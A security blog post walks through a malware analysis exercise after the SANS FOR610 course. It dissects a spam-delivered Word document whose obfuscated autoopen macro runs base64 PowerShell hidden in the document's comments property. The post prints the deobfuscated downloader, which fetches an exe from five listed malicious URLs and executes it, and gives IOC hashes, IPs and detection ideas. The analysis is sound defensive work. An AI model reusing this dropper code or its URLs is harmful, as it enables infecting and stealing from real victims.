What I learned by attending FOR610: Reverse-Engineering Malware / part 1

FOR610: Reverse-Engineering Malware

I attended SANS FOR610: Reverse-Engineering Malware instructed by Jess Garcia in Copenhagen (Sep-17). I’m now studying for certification and using captured malware samples for doing exercises. In this post I go through

  • Using public (OSINT) information;
  • Behavioural analysis with sandboxes (via a public malware sandbox);
  • Malicious Office documents.

Note that the purpose of the exercise is not to understand in detail every line of code in the malware. The analysis is done from an incident response point of view with the goal to extract useful Indicators of Compromise (IOCs), have a basic understanding of the malware and assess the impact of the malware.

MZZP3648741.doc

A received spam e-mail message included a link (not an attachment) pointing to a Word document. The Word document was

Filename: MZZP3648741.doc
Size: 75776 bytes
MD5: 1a4471c427c7b4d87f3edf0c150e4c89

Public / OSINT information

I downloaded the file on Mon 9-Oct-2017 and used the MD5 hash (do not upload files but use the hash) to check VirusTotal. The file was already recognised by VirusTotal and detected by 27 out of 60 AV-engines (upload time was 2017-10-09 14:37:31 UTC).


Note that the filename by which I got the sample (MZZP3648741) was not listed under the file names already seen by VirusTotal.

Based on VirusTotal you can already conclude that this sample

  • May try to run other files, shell commands or applications;
  • Makes use of macros;
  • Was already analysed by a sandbox (via the VirusTotal community comments).

Analyse the sample with a sandbox

The report from VirusTotal told us that there is already a public sandbox report available via VxStream but I wanted to use my account with VMRay to analyse the behaviour of this file in another sandbox.

VMRay gives me a couple of screenshots of the running sample. Based on the screenshots I can conclude that the document tries to lure the user into enabling content (enable the macro to start).

The sandbox shows that Word starts a Powershell script, that spawns to a couple of exe’s.


These exes are according to VMRay

c:\users\hjrd1koky ds8lujv\appdata\local\temp\59488.exe (Created File)
c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\evtlaunch.exe (Created File)
MD5: cffa5435c773932a8ef271a762ce7cfb

c:\users\hjrd1koky ds8lujv\appdata\local\microsoft\windows\hhgqj.exe (Created File)
MD5: 710a2d061953888d8efb6994c976b543

The PE header of the last exe contains a very recent compile time.



but most importantly, imports a number of interesting functions/DLLs.


Based on the functions

it is likely that the final exe (hhgqj.exe) is some sort of information stealer.

The VMRay analysis also provides the network indicators

matteostocchino.com/OpwqY/
66.147.244.177
198.1.78.129
46.4.67.203
147.135.209.118



As the purpose of the exercise is to practice skills I will also manually analyse the Word document.

Malicious Office documents

Deciding what are the important streams in an Office document

Oledump tells us that the file contains a stream (8) with a VBA macro.

oledump.py MZZP3648741.doc



We can use olevba to get more info on the macro and document. It will tell us that

  • when we open the document the macro autoopen will autostart (auto execute)
  • there’s a possible suspicious shell command
  • streams ‘Macros/VBA/ThisDocument’ and ‘Macros/VBA/Module1’ contain information that we should further analyse
olevba.py MZZP3648741.doc -a



Now let’s have a look at ‘Macros/VBA/ThisDocument’ (stream 9).

oledump.py MZZP3648741.doc -s 9 -v


and ‘Macros/VBA/Module1’ (stream 8) (with ASCII dump)

oledump.py MZZP3648741.doc -s 8 -v -a





Analysing the VBA code

The VBA macro contains two functions and two subs (FYI : functions return a value, a sub doesn’t). None of the functions or subs use arguments.

The previous analysis showed that the sub autoopen is called when opening the document. The VBA code in autoopen() (but also in the other functions and subs) is obfuscated by code that pretends to represent ASCII values but are nothing more than mathematical functions.

Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79

DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66

End Sub

Removing the obfuscation results in code that contains a number of variable assignments and a call to the sub DyEAfVFbGY. Besides the benefit of visual obfuscation I can not explain the reason for using the variable assignments (avrPreFPA, XsdndfxXk, etc.) and to my understanding they do not influence the flow of the code.

avrPreFPA = 1553
XsdndfxXk = 1284
epHeyVxU = 1309
tzyGYTAbft = 1617
ynpsKeY = 1981
HrgnxUf = 1292

Call sub DyEAfVFbGY

tFFBpbzEVBD = 2179
wWxbdvzHZu = 1965
UwkSNDsM = 1248
rBfuFxXEn = 1385
ZNZYbtVGX = 1936
NDwLRskNRm = 1292
VCLfrCtNZC = 1506

Jumping to the sub DyEAfVFbGY results in code with similar visual obfuscation and a call to the function SMUpGxrua. If we deobfuscate the code we end up with a function definition of

Function SMUpGxrua()
hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "

Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
End Function

That’s a lot of variables and none of the variables have been previously assigned or have a related function/sub, except one : TxxdszysVP. This function TxxdszysVP uses the same visual obfuscation and, after deobfuscation, contains

Function TxxdszysVP()

AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm

TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
End Function

A function needs to return a value. Because TxxdszysVP is called as a function we need to point our attention to where TxxdszysVP is assigned a value. Besides the obfuscation there’s also a part that contains ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv).

What is AKMnVPdkUnv? This value has been defined previously and, after deobfuscation, contains the string “comments” (“comme” + “nts”).


So, after removing all the obfuscation we can conclude that the VBA code calls the comment properties of the Office document.

How do you extract the document properties (including the comments)? With oledump!


oledump.py MZZP3648741.doc -M

The output of this command shows a lot of “weird” characters in the comments section. That’s also the section that is referenced by the VBA code. The last part of the comments section shows ‘==’. Why not use the base64dump utility to parse the output?

oledump.py MZZP3648741.doc -M | base64dump.py -d -s 7



The output looks like code that uses string manipulation to build a Powershell command. The actual execution is done via the combination of string manipulation (Mid +”e” ) and the Shell command that is launched with the ,0 option (meaning vbHide or hidden).

The easiest way to debug Powershell code is by using Powershell ISE.

The last part of the code is |invOkE-ExprEssiON. We can print the code that would be executed by replacing it with Write-Host.


This then results in a new web client object.

$wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = 
new-object random;$urls = 'http://matteostocchino.com/OpwqY/,http://damanidigital.com/w/,http://on-int
.com/JJEKjn/,http://ardentfilms.com/WuU/,http://markjgriffin.ie/Iy/'.Split(',');$name = $random.next(1
, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($
url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}

This code attempts to download an exe from 5 different sites and then stores the retrieved file with a filename consisting of a random number between 1 and 65536. At the time of writing, only one site was still active.

MD5 (index.html.exe) = cffa5435c773932a8ef271a762ce7cfb

Verifying conclusions from manual analysis with sandbox analysis

Based on the sandbox analysis we would have concluded that the file 59488 would be an IOC. However, analysing the actual code shows that this filename was randomly generated. The code also showed that next to the network IOC detected by VMRay there were 4 other URLs included.

  • The filename is randomly generated between 1 and 65536;
  • 5 different URLs are used to download a second stage of the malware.

In this case, doing the manual analysis costed more time but gave more detailed results. The information on the random file name could also be deducted by running the sample different times in a sandbox (in VMRay the sample was automatically analyzed 4 times, with 4 different MS Office versions).

Summary flow of the Office document

The workflow of the document was

  1. Lure user into enabling macro
  2. Obfuscated macro, autoopen() starts when macro’s enabled
  3. Different Subs / Functions, call to the comment property of the Office document
  4. Comments property contains base64 encoded Powershell
  5. Powershell script uses string manipulation to create and execute a web client object
  6. Web client downloads exe and stores it with a random filename

Summary IOCs

A proposal for detection can be done based on

  • The network information found in the Powershell script
  • Newly created filenames between 1 and 65536
  • Launch of Powershell from the Word process

Ideally the network IOCs are added to the IDS and the DNS firewall (blackhole DNS zone).

Analyzing cffa5435c773932a8ef271a762ce7cfb

The analysis of the file downloaded via the Powershell script will be covered in a follow-up post. Based on the information from VirusTotal and VxStream this is an emotet sample.

3 thoughts on “What I learned by attending FOR610: Reverse-Engineering Malware / part 1

  1. Mitch Impey on said:

    Hi Koen, great article, thanks for sharing this information. I was at Brucon a few weeks ago and took a session called Malware Triage by Sean Wilson and Sergei Frankoff from openanalysis.net. They shared alot of interesting things that you might find useful, like the Sublime editor and CyberChef for various decoding tasks (https://gchq.github.io/CyberChef/)
    Cheers, mitch

    • admin on said:

      Hi Mitch,

      Thank you for the info. Already a happy user of CyberChef ;-).
      Will look into the slides of that presentation, especially for info on Sublime Editor. Thanks!

      Koen

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.